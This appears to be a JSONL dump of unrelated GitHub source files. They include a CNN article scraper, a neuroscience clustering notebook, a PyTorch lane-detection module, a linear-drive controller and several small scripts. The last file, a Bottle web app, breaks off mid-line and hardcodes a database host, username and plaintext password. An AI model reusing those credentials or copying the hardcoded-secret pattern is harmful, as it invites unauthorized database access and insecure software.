+{"seq_id":"31656529222","text":"import scrapy\nimport re\nimport os.path\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.selector import HtmlXPathSelector\nfrom craigslist_sample.items import CNNItem\n\nclass MySpider(CrawlSpider):\n name = \"cnn\"\n allowed_domains = [\"cnn.com\"]\n start_urls = ['http://www.cnn.com/']\n \n base_url = 'http://www.cnn.com/sitemaps/sitemap-articles'\n year = ['2016','2015','2014','2013','2012','2011']\n month = ['12','11','10','09','08','07','06','05','04','03','02','01']\n \n def parse(self,response):\n for y in self.year:\n for m in self.month:\n url = self.base_url+'-'+y+'-'+m+'.xml'\n yield scrapy.Request(url,self.parseList)\n \n def parseList(self,response):\n nodename = 'loc'\n text = body_or_str(response)\n r = re.compile(r\"(<%s[\\s>])(.*?)(%s>)\" % (nodename, nodename), re.DOTALL)\n for match in r.finditer(text):\n url = match.group(2)\n yield scrapy.Request(url,self.parse_items)\n\n def parse_items(self, response):\n hxs = HtmlXPathSelector(response)\n items = []\n item = CNNItem()\n item[\"title\"] = hxs.select('//h1[@class=\"pg-headline\"]/text()').extract()\n item[\"article\"] = hxs.select('//div[@class=\"zn-body__paragraph\"]/text()').extract()\n item[\"link\"] = response.url\n items.append(item)\n splitUrl = response.url.split('/')\n year = splitUrl[3]\n month = splitUrl[4]\n day = splitUrl[5]\n name1 = item[\"title\"][0]\n name = \"\".join(re.findall(\"[a-zA-Z]+\", name1))\n article = \"\\n\".join(item['article'])\n save_path = os.path.join('data',year+\"-\"+month+\"-\"+day,name+\".txt\")\n if not os.path.exists(os.path.dirname(save_path)):\n try:\n os.makedirs(os.path.dirname(save_path))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n with open(save_path, 'a+') as f:\n f.write('name: {0} \\nlink: {1}\\n\\n {2}'.format(name, item['link'], article.encode('utf8')))\n return(items)\n","repo_name":"Helen-ChenHan/CNNnews","sub_path":"CNN/craigslist_sample/spiders/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3300730918","text":"# %% [markdown]\n# # THE MIND OF A MAGGOT\n\n# %% [markdown]\n# ## Imports\nimport os\nimport time\nimport warnings\n\nimport colorcet as cc\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom anytree import LevelOrderGroupIter, NodeMixin\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.linalg import orthogonal_procrustes\nfrom scipy.optimize import linear_sum_assignment\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.metrics import adjusted_rand_score\nfrom sklearn.utils.testing import ignore_warnings\nfrom tqdm import tqdm\n\nimport pymaid\nfrom graspy.cluster import GaussianCluster\nfrom graspy.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed, selectSVD\nfrom graspy.models import DCSBMEstimator, RDPGEstimator, SBMEstimator\nfrom graspy.plot import heatmap, pairplot\nfrom graspy.simulations import rdpg\nfrom graspy.utils import augment_diagonal, binarize, pass_to_ranks\nfrom src.cluster import (\n MaggotCluster,\n add_connections,\n compute_pairedness_bipartite,\n crossval_cluster,\n fit_and_score,\n get_paired_inds,\n make_ellipses,\n plot_cluster_pairs,\n plot_metrics,\n predict,\n)\nfrom src.data import load_metagraph\nfrom src.graph import MetaGraph, preprocess\nfrom src.hierarchy import signal_flow\nfrom src.io import savecsv, savefig\nfrom src.pymaid import start_instance\nfrom src.visualization import (\n CLASS_COLOR_DICT,\n adjplot,\n barplot_text,\n gridmap,\n matrixplot,\n set_axes_equal,\n stacked_barplot,\n)\n\nwarnings.filterwarnings(action=\"ignore\", category=ConvergenceWarning)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n}\nfor key, val in rc_dict.items():\n mpl.rcParams[key] = val\ncontext = sns.plotting_context(context=\"talk\", font_scale=1, rc=rc_dict)\nsns.set_context(context)\n\nPLOT_MODELS = True\n\nnp.random.seed(8888)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name)\n\n\n# %% [markdown]\n# ## Load data\n# In this case we are working with `G`, the directed graph formed by summing the edge\n# weights of the 4 different graph types. Preprocessing here includes removing\n# partially differentiated cells, and cutting out the lowest 5th percentile of nodes in\n# terms of their number of incident synapses. 5th percentile ~= 12 synapses. After this,\n# the largest connected component is used.\n\nmg = load_metagraph(\"G\", version=\"2020-04-01\")\nmg = preprocess(\n mg,\n threshold=0,\n sym_threshold=False,\n remove_pdiff=True,\n binarize=False,\n weight=\"weight\",\n)\nmeta = mg.meta\n\n# plot where we are cutting out nodes based on degree\ndegrees = mg.calculate_degrees()\nfig, ax = plt.subplots(1, 1, figsize=(5, 2.5))\nsns.distplot(np.log10(degrees[\"Total edgesum\"]), ax=ax)\nq = np.quantile(degrees[\"Total edgesum\"], 0.05)\nax.axvline(np.log10(q), linestyle=\"--\", color=\"r\")\nax.set_xlabel(\"log10(total synapses)\")\n\n# remove low degree neurons\nidx = meta[degrees[\"Total edgesum\"] > q].index\nmg = mg.reindex(idx, use_ids=True)\n\n# remove center neurons # FIXME\nidx = mg.meta[mg.meta[\"hemisphere\"].isin([\"L\", \"R\"])].index\nmg = mg.reindex(idx, use_ids=True)\n\nmg = mg.make_lcc()\nmg.calculate_degrees(inplace=True)\nmeta = mg.meta\n\nadj = mg.adj\nmeta[\"inds\"] = range(len(meta))\n\n# %% [markdown]\n# ##\n# param_grid = {\n# \"embed\": [\"ase\", \"unscaled_ase\", \"lse\"],\n# \"realign\": [True, False],\n# \"reembed\": [True, False],\n# \"metric\": [\"ARI\", \"bic\", \"lik\"],\n# }\nparam_grid = {\n \"embed\": [\"ase\"],\n \"realign\": [False],\n \"reembed\": [False],\n \"metric\": [\"bic\"],\n}\n\nfrom sklearn.model_selection import ParameterGrid\n\nparams = list(ParameterGrid(param_grid))\nn_levels = 7\n\nmcs = []\nfor p in params:\n metric = p[\"metric\"]\n embed = p[\"embed\"]\n realign = p[\"realign\"]\n reembed = p[\"reembed\"]\n basename = f\"-{p}\".replace(\" \", \"\")\n basename = basename.replace(\":\", \"=\")\n basename = basename.replace(\",\", \"-\")\n basename = basename.replace(\"'\", \"\")\n print(basename)\n\n np.random.seed(8888)\n\n mc = MaggotCluster(\n \"0\",\n adj=adj,\n meta=meta,\n n_init=25,\n stashfig=stashfig,\n min_clusters=2,\n max_clusters=3,\n n_components=4,\n embed=embed,\n realign=realign,\n reembed=reembed,\n )\n\n for i in range(n_levels):\n for j, node in enumerate(mc.get_lowest_level()):\n node.fit_candidates(plot_metrics=False)\n for j, node in enumerate(mc.get_lowest_level()):\n node.select_model(2, metric=metric)\n mc.collect_labels()\n\n fig, axs = plt.subplots(1, n_levels, figsize=(10 * n_levels, 30))\n for i in range(n_levels):\n ax = axs[i]\n stacked_barplot(\n mc.meta[f\"lvl{i}_labels_side\"],\n mc.meta[\"merge_class\"],\n category_order=np.unique(mc.meta[f\"lvl{i}_labels_side\"].values),\n color_dict=CLASS_COLOR_DICT,\n norm_bar_width=False,\n ax=ax,\n )\n ax.set_yticks([])\n ax.get_legend().remove()\n\n stashfig(f\"count-barplot-lvl{i}\" + basename)\n plt.close()\n\n fig, axs = plt.subplots(1, n_levels, figsize=(10 * n_levels, 30))\n for i in range(n_levels):\n ax = axs[i]\n stacked_barplot(\n mc.meta[f\"lvl{i}_labels_side\"],\n mc.meta[\"merge_class\"],\n category_order=np.unique(mc.meta[f\"lvl{i}_labels_side\"].values),\n color_dict=CLASS_COLOR_DICT,\n norm_bar_width=True,\n ax=ax,\n )\n ax.set_yticks([])\n ax.get_legend().remove()\n\n stashfig(f\"prop-barplot-lvl{i}\" + basename)\n plt.close()\n\n for i in range(n_levels):\n fig, ax = plt.subplots(1, 1, figsize=(20, 20))\n adjplot(\n adj,\n meta=mc.meta,\n sort_class=f\"lvl{i}_labels_side\",\n item_order=\"merge_class\",\n plot_type=\"scattermap\",\n sizes=(0.5, 1),\n ticks=False,\n colors=\"merge_class\",\n ax=ax,\n palette=CLASS_COLOR_DICT,\n gridline_kws=dict(linewidth=0.2, color=\"grey\", linestyle=\"--\"),\n )\n stashfig(f\"adj-lvl{i}\" + basename)\n\n mcs.append(mc)\n\n\n# %%\nnodes = mc.get_lowest_level()\ncounts = []\nfor n in nodes:\n print(len(n.meta))\n counts.append(len(n.meta))\ncounts = np.array(counts)\nbig = np.max(counts)\nbig_ind = np.where(counts == big)[0][0]\n\n# %% [markdown]\n# ##\nnode = nodes[big_ind]\n\n# get number that are paired\nnode.meta[node.meta[\"Pair\"].isin(node.meta.index)]\n# 52 / 215 have a pair here\n\n# get degrees\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total edgesum\"], ax=ax)\nsns.distplot(meta[\"Total edgesum\"], ax=ax)\nstashfig(\"big-guy-edgesum-joint\")\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total degree\"], ax=ax)\nsns.distplot(meta[\"Total degree\"], ax=ax)\nstashfig(\"big-guy-degree-joint\")\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total edgesum\"], ax=ax)\nstashfig(\"big-guy-edgesum\")\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total degree\"], ax=ax)\nstashfig(\"big-guy-degree\")\n\n# %% [markdown]\n# ##\nfrom src.visualization import plot_neurons\n\n\nstart_instance()\nkey = \"lvl6_labels\"\nfor tp in np.unique(mc.meta[key]):\n plot_neurons(mc.meta, key, tp)\n stashfig(f\"neurons-{key}-{tp}\")\n plt.close()\n\n","repo_name":"neurodata/maggot_models","sub_path":"notebooks/127.2-BDP-more-silly-model.py","file_name":"127.2-BDP-more-silly-model.py","file_ext":"py","file_size_in_byte":7618,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"30557319945","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\nclass RESA(nn.Module):\n def __init__(self):\n super(RESA, self).__init__()\n self.iter = 5 # 5\n chan = 128 # 128\n fea_stride = 8 # 原图相对于此时的特征图大小的倍数\n self.height = 720 // fea_stride # 46\n self.width = 1280 // fea_stride # 80\n self.alpha = 2 # 2\n conv_stride = 9 # 9\n\n for i in range(self.iter):\n conv_vert1 = nn.Conv2d(chan, chan, (1, conv_stride),padding=(0, conv_stride//2), groups=1, bias=False)\n conv_vert2 = nn.Conv2d(chan, chan, (1, conv_stride),padding=(0, conv_stride//2), groups=1, bias=False)\n\n setattr(self, 'conv_d'+str(i), conv_vert1)\n setattr(self, 'conv_u'+str(i), conv_vert2)\n\n conv_hori1 = nn.Conv2d(chan, chan, (conv_stride, 1),padding=(conv_stride//2, 0), groups=1, bias=False)\n conv_hori2 = nn.Conv2d(chan, chan, (conv_stride, 1),padding=(conv_stride//2, 0), groups=1, bias=False)\n\n setattr(self, 'conv_r'+str(i), conv_hori1)\n setattr(self, 'conv_l'+str(i), conv_hori2)\n\n idx_d = (torch.arange(self.height) + self.height //2**(self.iter - i)) % self.height\n setattr(self, 'idx_d'+str(i), idx_d)\n\n idx_u = (torch.arange(self.height) - self.height //2**(self.iter - i)) % self.height\n setattr(self, 'idx_u'+str(i), idx_u)\n\n idx_r = (torch.arange(self.width) + self.width //2**(self.iter - i)) % self.width\n setattr(self, 'idx_r'+str(i), idx_r)\n\n idx_l = (torch.arange(self.width) - self.width //2**(self.iter - i)) % self.width\n setattr(self, 'idx_l'+str(i), idx_l)\n\n def forward(self, x):\n x = x.clone()\n\n for direction in ['d', 'u']:\n for i in range(self.iter):\n conv = getattr(self, 'conv_' + direction + str(i))\n idx = getattr(self, 'idx_' + direction + str(i))\n x.add_(self.alpha * F.relu(conv(x[..., idx, :])))\n\n for direction in ['r', 'l']:\n for i in range(self.iter):\n conv = getattr(self, 'conv_' + direction + str(i))\n idx = getattr(self, 'idx_' + direction + str(i))\n x.add_(self.alpha * F.relu(conv(x[..., idx])))\n\n return x\n\n\n\nif __name__ == \"__main__\":\n import torch\n img = torch.rand(1, 128, 90, 160).cuda()\n model = RESA().cuda()\n output = model(img)\n print(output.size)\n\n\n# fea torch.Size([4, 128, 46, 80])\n# resa torch.Size([4, 128, 46, 80])\n# seg torch.Size([4, 7, 368, 640])\n# exist torch.Size([4, 6])\n","repo_name":"033186ZSY/RLSNet-master","sub_path":"rlsnet/resa.py","file_name":"resa.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"416421459","text":"import os\nimport click\nfrom PyInquirer import prompt\n\nfrom distutils.dir_util import copy_tree, remove_tree\nfrom malas_path import config_path, malas_path\n\nquestions = [\n # Learn more in https://github.com/CITGuru/PyInquirer#question-types\n {\n 'type': 'confirm',\n 'name': 'confirmation',\n 'message': 'Configuration already exist, reset to factory?',\n 'default': True\n },\n {\n 'type': 'confirm',\n 'name': 'keep_config',\n 'message': 'Keep config?',\n 'default': True\n },\n\n]\n\n@click.command()\ndef initial():\n \"\"\"\n Initialize folder and other\n \"\"\"\n replace = True\n keep_config = False\n\n if os.path.isdir(config_path):\n answer = prompt(questions)\n replace = answer.get('confirmation')\n keep_config = answer.get('keep_config')\n\n if replace:\n if os.path.isdir(f'{config_path}/config'):\n copy_tree(src=f'{config_path}/config', dst=f'{config_path}/config_backup')\n remove_tree(f'{config_path}/config')\n\n folders = ['config', 'plugins']\n for folder in folders:\n os.makedirs(f'{config_path}/{folder}', exist_ok=True)\n\n copy_tree(src=f'{malas_path}/malas_config/', dst=config_path)\n\n if keep_config:\n copy_tree(src=f'{config_path}/config_backup', dst=f'{config_path}/config')\n remove_tree(f'{config_path}/config_backup')\n\n click.echo(f\"Creating configuration folder in {config_path}\")\n else:\n click.echo(\"Nothing change\")\n","repo_name":"tegarimansyah/malas-cli","sub_path":"malas-cli/malas_init.py","file_name":"malas_init.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"16506645697","text":"def diccionario_geringoso(listaDePalabras):\n diccionario={}\n for cadena in listaDePalabras:\n cadenaFinal=''\n for c in cadena:\n cadenaFinal+=c\n if c=='a':\n cadenaFinal+= 'pa'\n elif c=='e':\n cadenaFinal+= 'pe'\n elif c=='i':\n cadenaFinal+= 'pi'\n elif c=='o':\n cadenaFinal+= 'po'\n elif c=='u':\n cadenaFinal+= 'pu'\n \n diccionario[cadena]=cadenaFinal\n return diccionario \n\nlista=['banana', 'manzana', 'mandarina']\nprint(diccionario_geringoso(lista))\n","repo_name":"CristianAmici/python","sub_path":"clase02/diccionario_geringoso.py","file_name":"diccionario_geringoso.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2186468294","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\na, b = map(int, input().split())\r\nc, d = map(int, input().split())\r\nprime = [1] * 1001\r\n\r\nfor i in range(2, int((1000)**0.5)+1):\r\n if prime[i] == 1:\r\n for j in range(i+i, 1001, i):\r\n prime[j] = 0\r\n\r\nif b >= c:\r\n tmp = sum(prime[c:b+1])\r\nelse:\r\n tmp = 0\r\n\r\nyt = sum(prime[a:b+1]) - tmp\r\nyj = sum(prime[c:d+1]) - tmp\r\n\r\nif tmp % 2 == 0:\r\n if yt > yj:\r\n print(\"yt\")\r\n else:\r\n print(\"yj\")\r\nelse:\r\n if yt >= yj:\r\n print(\"yt\")\r\n else:\r\n print(\"yj\")","repo_name":"rloldl-c/algorithm","sub_path":"백준/Silver/25632. 소수 부르기 게임/소수 부르기 게임.py","file_name":"소수 부르기 게임.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"14859459098","text":"import math\nfrom technosoftlineardrive.tml import *\nimport struct\n\nSERVO_DEFAULT_ACCELERATION = 0.1751 # IU\nSERVO_DEFAULT_SPEED = 31.831 # IU\n\nMAX_ACCELERATION = 0.3 # IU\nMAX_SPEED = 170 # IU\n\n# Here be some dragons. Kind and friendly dragons, but dragons nonetheless.\n\ndef create_linear_drive_program(pos_amount,\n acceleration=SERVO_DEFAULT_ACCELERATION,\n speed=SERVO_DEFAULT_SPEED):\n \"\"\"\n Create a assembly tml program for the linear drive.\n \n :param pos_amount: amount to move linear drives position relatively.\n :param acceleration: how fast the linear drive will accelerate to it's desired speed.\n :param speed: how fast the linear drive will move to desired position.\n :return assemble_program: a complete assembly program to run on the linear drive.\n \"\"\"\n assert (acceleration <= MAX_ACCELERATION)\n assert (speed <= MAX_SPEED)\n\n def pack_int(num):\n \"\"\"\n Pack a integer to a struct for using in serial communication.\n \n :param num: integer to pack.\n :return num: as a packed integer for use in serial communication. \n \"\"\"\n return struct.unpack(\"HH\", struct.pack(\"i\", num))\n\n def to_fixed_point(num):\n \"\"\"\n Pack a number to a fixed point type and pack it as a struct.\n \n :param num: number to pack to a fixed point type.\n :return num: as a packed fixed point for use in serial communication. \n \"\"\"\n return pack_int(math.floor(num * 0x10000)) # Magic? No.\n\n # Unpack into word16\n (pos_low, pos_hi) = pack_int(pos_amount)\n (accel_low, accel_hi) = to_fixed_point(acceleration)\n (speed_low, speed_hi) = to_fixed_point(speed)\n # Return the program\n return assemble_program([\n CACC(accel_low, accel_hi),\n CSPD(speed_low, speed_hi),\n CPOS(pos_low, pos_hi),\n CSET(0xDFFF, 0x0000),\n CSET(0xBFC1, 0x8701),\n CSET(0xFFFF, 0x4000),\n UPD()#,\n # NOTMC(),\n # WAIT()\n ])\n\n","repo_name":"PUM-9/TreeD","sub_path":"technosoft-linear-drive/src/technosoftlineardrive/assemblyprogram.py","file_name":"assemblyprogram.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9229176081","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 10 11:37:11 2023\n\n@author: User\n\"\"\"\nimport pandas as pd\nfrom textblob import Blobber #pip install textblob\nfrom textblob_fr import PatternTagger, PatternAnalyzer #pip install textblob-fr\ntb = Blobber(pos_tagger=PatternTagger(), analyzer=PatternAnalyzer())\n\n\n\ndef note(nb):\n if nb > 0 : \n return \"Positif\"\n elif nb < 0 : \n return \"Négatif\"\n else:\n return \"Neutre\"\n\n\n\ndef analyse_sentiment(data):\n dictionnaire = {}\n for auteur in data[\"author\"].unique():\n dictionnaire[auteur] = []\n \n data.loc[max(data.index)+1] = [0,0,\"\",0,0,\"\",\"\",\"\"]\n parole = data[\"author\"][0]\n text = \"\"\n for i in data.index:\n if parole == data[\"author\"][i]:\n text += \" \"+data[\"text\"][i]\n else: \n analysis = note(tb(text).sentiment[0])\n dictionnaire[data[\"author\"][i-1]].append(analysis)\n parole = data[\"author\"][i]\n text = data[\"text\"][i]\n \n \n \n sentiment = {}\n sentiment[\"global\"] = [0,0,0]\n for auteur in dictionnaire.keys():\n sentiment[auteur] = [dictionnaire[auteur].count('Positif'),dictionnaire[auteur].count('Neutre'),dictionnaire[auteur].count('Négatif')]\n \n sentiment[\"global\"][0] += dictionnaire[auteur].count('Positif')\n sentiment[\"global\"][1] += dictionnaire[auteur].count('Neutre')\n sentiment[\"global\"][2] += dictionnaire[auteur].count('Négatif')\n \n return sentiment\n\n\n \n\n","repo_name":"TMayling/IR","sub_path":"Sentiment_Analysis_Signature.py","file_name":"Sentiment_Analysis_Signature.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73143685288","text":"# pylint: disable=E1101:no-member\r\n\"\"\"\r\nAudio utils.\r\n\"\"\"\r\nfrom typing import Optional\r\nimport torch\r\nfrom torch.nn.functional import pad\r\nfrom torchaudio.functional import resample\r\n\r\n\r\ndef convert_audio(\r\n audio: torch.Tensor,\r\n sample_rate: int,\r\n target_sample_rate: int,\r\n target_channels: int,\r\n target_duration: Optional[float] = None,\r\n normalize: bool = False,\r\n fadeout_duration: float = 0.1,\r\n) -> torch.Tensor:\r\n \"\"\"\r\n Converts an audio tensor to the desired sample rate, number of channels, and duration using various transformations.\r\n\r\n Args:\r\n audio (torch.Tensor): The input audio tensor of shape (n_sounds, n_channels, n_samples).\r\n sample_rate (int): The sample rate of the input audio tensor.\r\n target_sample_rate (int): The target sample rate to convert the input audio tensor to.\r\n target_channels (int): The target number of channels to convert the input audio tensor to.\r\n target_duration (float): The target duration of the output audio tensor in seconds.\r\n Note that the input audio tensor will be padded or truncated (with a fade out - see below)\r\n to the target length if necessary. Pass None to leave the input audio tensor unchanged. (Default: None)\r\n normalize (bool): Whether to normalize the input audio tensor. (Default: False)\r\n fadeout_duration (float): The duration of the fadeout in seconds. If not specified, defaults to 100ms.\r\n (Default: 0.1)\r\n\r\n Returns:\r\n torch.Tensor: The transformed audio tensor of the specified sample rate, number of channels, and duration.\r\n \"\"\"\r\n assert audio.shape[-2] in [1, 2], \"Audio must be mono or stereo.\"\r\n\r\n # convert to mono if required\r\n audio = (\r\n audio.mean(-2, keepdim=True)\r\n if (target_channels == 1) and (audio.shape[-2] == 2)\r\n else audio\r\n )\r\n\r\n # convert to stereo if required\r\n if (target_channels == 2) and (audio.shape[-2] == 1):\r\n audio = audio.expand(*audio.shape[:-2], target_channels, -1)\r\n\r\n # resample to target sample rate\r\n if sample_rate != target_sample_rate:\r\n audio = audio.clone() # might raise an error without\r\n audio = resample(audio, sample_rate, target_sample_rate)\r\n\r\n # truncate to target duration and apply fade out if required\r\n if target_duration is not None:\r\n target_num_samples = int(target_duration * target_sample_rate)\r\n\r\n if audio.shape[-1] > target_num_samples:\r\n fadeout_num_samples = int(fadeout_duration * target_sample_rate)\r\n fadeout = (\r\n torch.linspace(1, 0, fadeout_num_samples)\r\n if fadeout_num_samples > 0\r\n else 1.0\r\n )\r\n audio = audio[..., :target_num_samples]\r\n audio[..., -fadeout_num_samples:] *= fadeout\r\n\r\n # zero-pad to target duration if required\r\n elif audio.shape[-1] < target_num_samples:\r\n audio = pad(audio, (0, target_num_samples - audio.shape[-1]))\r\n\r\n # normalize if required\r\n audio = (\r\n (audio / audio.abs().amax((-2, -1), keepdim=True)) * 0.99\r\n if normalize\r\n else audio\r\n )\r\n\r\n return audio\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"utils/audio.py run successfully.\")\r\n","repo_name":"pcmbs/preset-embedding_audio-model-selection","sub_path":"src/utils/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9854431652","text":"import requests\nimport os\nfrom iidda_api import read_config\nimport aiohttp\nimport asyncio\nfrom iidda_api import get_release_list\nfrom aiohttp_client_cache import FileBackend\nfrom appdirs import *\n\n\ndef convert_to_raw(url):\n '''Converts github.com url to raw.githubusercontent.com url\n\n Args:\n url (str): link with base url \"github.com\" to a file stored on github\n\n Returns:\n str: equivalent url with \"raw.githubusercontent.com\" base url\n '''\n return url.replace(\"github.com\", \"raw.githubusercontent.com\").replace(\"/blob/\", \"/\")\n\n\nasync def get_pipeline_dependencies(dataset_name, version=\"latest\", version_tag=\"\"):\n '''Downloads all pipeline_dependencies of a dataset\n\n Args:\n dataset_name (str): name of the dataset\n version (str, int, optional): version of the dataset\n version_tag (str, optional): version prefix of dataset (e.g. \"v9-\" indicates version 9 of a particular dataset)\n\n Returns:\n list: list of tuples. Each tuple contains a file's name and content\n '''\n # Get access token\n ACCESS_TOKEN = read_config('access_token')\n # make cache directory\n cache_path = user_cache_dir(\"iidda-api-cache\", \"\")\n if not os.path.isdir(cache_path):\n os.makedirs(cache_path)\n # Cache configurations\n release_list_cache = FileBackend(\n cache_name=cache_path + \"/release_list\"\n )\n\n releases = asyncio.run(get_release_list(\n ACCESS_TOKEN, release_list_cache, clear_cache=False))\n\n # filter through and sort all releases of this name ascending by version\n release_list = filter(\n lambda release: release['name'] == dataset_name, releases)\n release_list = sorted(\n release_list, key=lambda release: int(release['body'][8:]))\n\n # check if dataset is contained in repo\n if not release_list:\n return \"This dataset does not exist in the releases\"\n\n if version == \"latest\":\n version = len(release_list)\n\n if int(version) > len(release_list):\n return f\"The supplied version is greater than the latest version. The latest version is {len(release_list)}\"\n\n release = release_list[int(version) - 1]\n\n headers = {\n 'Authorization': 'token ' + ACCESS_TOKEN,\n 'Accept': 'application/octet-stream'\n }\n\n for asset in release['assets']:\n if asset['name'] == dataset_name + \".json\":\n response = requests.get(asset['url'], stream=True, headers=headers)\n if response.ok:\n dataset_metadata = response.json()\n\n async def main():\n async with aiohttp.ClientSession(headers={'Authorization': 'token ' + ACCESS_TOKEN, 'Accept': 'application/vnd.github.v3.raw'}) as session:\n tasks = []\n for relatedIdentifier in dataset_metadata['relatedIdentifiers']:\n if relatedIdentifier['relatedIdentifierType'] == \"URL\":\n if isinstance(relatedIdentifier['relatedIdentifier'], list):\n for link in relatedIdentifier['relatedIdentifier']:\n url = convert_to_raw(link)\n task = asyncio.ensure_future(\n download_dependencies(url, session))\n tasks.append(task)\n else:\n url = convert_to_raw(\n relatedIdentifier['relatedIdentifier'])\n task = asyncio.ensure_future(\n download_dependencies(url, session))\n tasks.append(task)\n\n files = await asyncio.gather(*tasks)\n return files\n\n async def download_dependencies(url, session):\n if url == \"on mcmaster math server (file to large for github)\":\n file_name = file_name = version_tag + dataset_name + \"/\" + \\\n version_tag + dataset_name + \"_dependencies/\" + url + \".txt\"\n return (file_name, \"on mcmaster math server (file to large for github)\")\n else:\n file_name = version_tag + dataset_name + \"/\" + version_tag + \\\n dataset_name + \"_dependencies/\" + \\\n os.path.basename(url[34:])\n async with session.get(url) as response:\n file_content = await response.read()\n return (file_name, file_content)\n\n return asyncio.run(main())\n else:\n return \"Failure in getting assets from GitHub {}\\n{}\".format(response.status_code, response.text)\n","repo_name":"canmod/iidda-tools","sub_path":"python/iidda_api/get_pipeline_dependencies.py","file_name":"get_pipeline_dependencies.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4482114356","text":"# *-* coding:utf-8 *-*\n#!/usr/bin/python\n'''\n*******Creator*******\nSe varje funktion\n'''\nimport bottle\nfrom modules import log\nfrom modules import handleUsers\nfrom modules import addmod\nfrom bottle import route, get, post, run, template, error, static_file, request, redirect, abort, response, app\nfrom beaker.middleware import SessionMiddleware\nimport MySQLdb\n\ndb = None\ncursor = None\n\ndef call_database():\n\t#Skriven av: Jari & Jacob (Parprogrammering)\n\tglobal db\n\tglobal cursor\n\tdb = MySQLdb.connect(host=\"195.178.232.16\", port=3306, user=\"AC8240\", passwd=\"hejhej123\", db=\"AC8240\")\n\tcursor = db.cursor()\n\treturn cursor\n\ndef hang_up_on_database():\n\t#Skriven av: Jari & Jacob (Parprogrammering)\n\tglobal db\n\tdb = db.close()\n\n'''*********Routes*********'''\n\n@route('/')\ndef startPage():\n\t#Skriven av: Jari\n\tif log.is_user_logged_in() == True:\n\t\tredirect('/admin')\n\telse:\n\t\tredirect('/login')\n\n\n'''*********Login*********'''\n\n@route('/login')\ndef login():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in() == True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn template('login', pageTitle='Logga in')\n\n\n@route('/ajax', method=\"POST\")\ndef ajax_validation():\n\t#Skriven av: Jacob\n\tcursor = call_database()\n\tresult = log.ajax_validation(cursor)\n\thang_up_on_database()\n\tif result == False:\n\t\treturn 'error'\n\telse:\n\t\treturn 'ok'\n\n@route('/do_login', method='POST')\ndef do_login():\n\t#Skriven av: Jacob\n\tcursor = call_database()\n\tresponse = log.login(cursor)\n\thang_up_on_database()\n\tif response == True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error('Tyvärr - användaren finns inte!')\n\n\n@route('/log_out')\ndef log_out():\n\t#Skriven av: Jacob\n\tlog.log_out()\n\tredirect('/login')\n\n@route('/admin')\ndef admin():\n\t#Skriven av: Jacob & Jari\n\t#Mindre uppdateringar: Sofia\n\tlog.validate_autho() #kontrollerar om användaren är inloggad\n\tcursor = call_database()\n\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\n\tif user_level == 1:\n\t\tads_untreated = []\n\t\tads_ongoing = []\n\t\tads_finished = []\n\n\t\tads_to_apply_on=addmod.available_ads(userid, cursor)\n\t\tall_ads=addmod.sort_by_status(userid, cursor)\n\t\tfor each in all_ads:\n\t\t\tif each[7]=='Obehandlad':\n\t\t\t\tads_untreated.append(each)\n\t\t\telif each[7]=='Vald':\n\t\t\t\tads_ongoing.append(each)\n\t\t\telif each[7]=='Avslutad':\n\t\t\t\tads_finished.append(each)\n\t\tdenied_missions = 